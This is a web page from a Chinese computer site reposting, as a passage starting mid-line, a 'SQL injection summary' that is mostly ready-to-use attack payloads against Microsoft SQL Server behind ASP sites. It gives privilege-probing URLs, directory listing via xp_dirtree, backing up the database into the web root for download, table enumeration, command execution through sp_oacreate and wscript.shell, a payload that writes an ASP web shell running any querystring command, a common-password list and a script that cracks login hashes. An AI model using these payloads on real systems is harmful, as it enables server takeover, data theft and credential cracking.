| 下载中心 | 文章中心 | 虚拟主机 | 网站开发 | 加入收藏 | 设为首页  
   本站首页 | 公司资讯 | 业内资讯 | 服务器类 | 黑客相关 | 私服技术 | 家用电脑 | 网站建设 | 局域网类 | 网吧相关 | 游戏攻略 | 编程开发 | 软件应用 | 硬件维修 | 分类
 站内搜索:
  百度热门搜索: it教育 网络教育 网站推广 创业致富 电动车 太阳能 瘦身产品 公告: 联邦电脑十周年系列操作系统,快速稳定,欢迎下载使用!
  热门阅读
  相关文章
Sql注射总结
作者:佚名  来源:不详  发布时间:2008-6-19 7:50:04  发布人:snlb

减小字体 增大字体

EMEMBER('setupadmin'));--
语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
语句5:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--
把路径写到表中去:
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-
http://http://www.xxxxx.com/down/list.asp?id=1;insert  dirs exec master.dbo.xp_dirtree 'c:\'-
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-
语句:http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
语句:http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'e:\web'--
语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-
数据库备份到网页目录:下载
http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--


and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)
and%201=(select%20Top%201%20col_name(object_id('USER_LOGIN'),1)%20from%20sysobjects) 参看相关表。
and 1=(select%20user_id%20from%20USER_LOGIN)
and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)


……………………………………………………
-- wscript.shell example
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
It could be run in our sample scenario by specifying the following username (all on one line):
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--
2) This example uses the 'scripting.filesystemobject' object to read a known text file:
-- scripting.filesystemobject example - read a known file
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
3) This example creates an ASP script that will run any command passed to it in the querystring:
-- scripting.filesystemobject example - create a 'run this' .asp file
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'
It is important to note that when running on a Windows NT4, IIS4 platform, commands issued by this ASP script will run as the 'system' account. In IIS5, however, they will run as the low-privileged IWAM_xxx account.
4) This (somewhat spurious) example illustrates the flexibility of the technique; it uses the 'speech.voicetext' object, causing the SQL Server to speak: Page 16
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528
waitfor delay '00:00:05'
This could of course be run in our example scenario, by specifying the following 'username' (note that the example is not only injecting a script, but simultaneously logging in to the application as 'admin'):
Username: admin'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--


常用密码和相关语句:
password
sqlserver
sql
admin
sesame
sa
guest
Here is the script:
(sqlcrack.sql)
create table tempdb..passwords( pwd varchar(255) )
bulk insert tempdb..passwords from 'c:\temp\passwords.txt'
select name, pwd from tempdb..passwords inner join sysxlogins
on (pwdcompare( pwd, sysxlogins.password, 0 ) = 1)
union select name, name from sysxlogins where
(pwdcompare( name, sysxlogins.password, 0 ) = 1)
union select sysxlogins.name, null from sysxlogins join syslogins on sysxlogins.sid=syslogins.sid
where sysxlogins.password is null and
syslogins.isntgroup=0 and
syslogins.isntuser=0
drop table tempdb.

上一页  [1] [2] [3] [4] [5]  下一页
[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:破解网络净化器
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站地图
  联邦电脑版权所有 Copyright©1996-2004 联邦电脑 All Rights Reserved  
   xkej@sina.com 业务联系:0516-88380202 88085202 QQ: 81566563  
  苏ICP备05045772号 当前在线人数: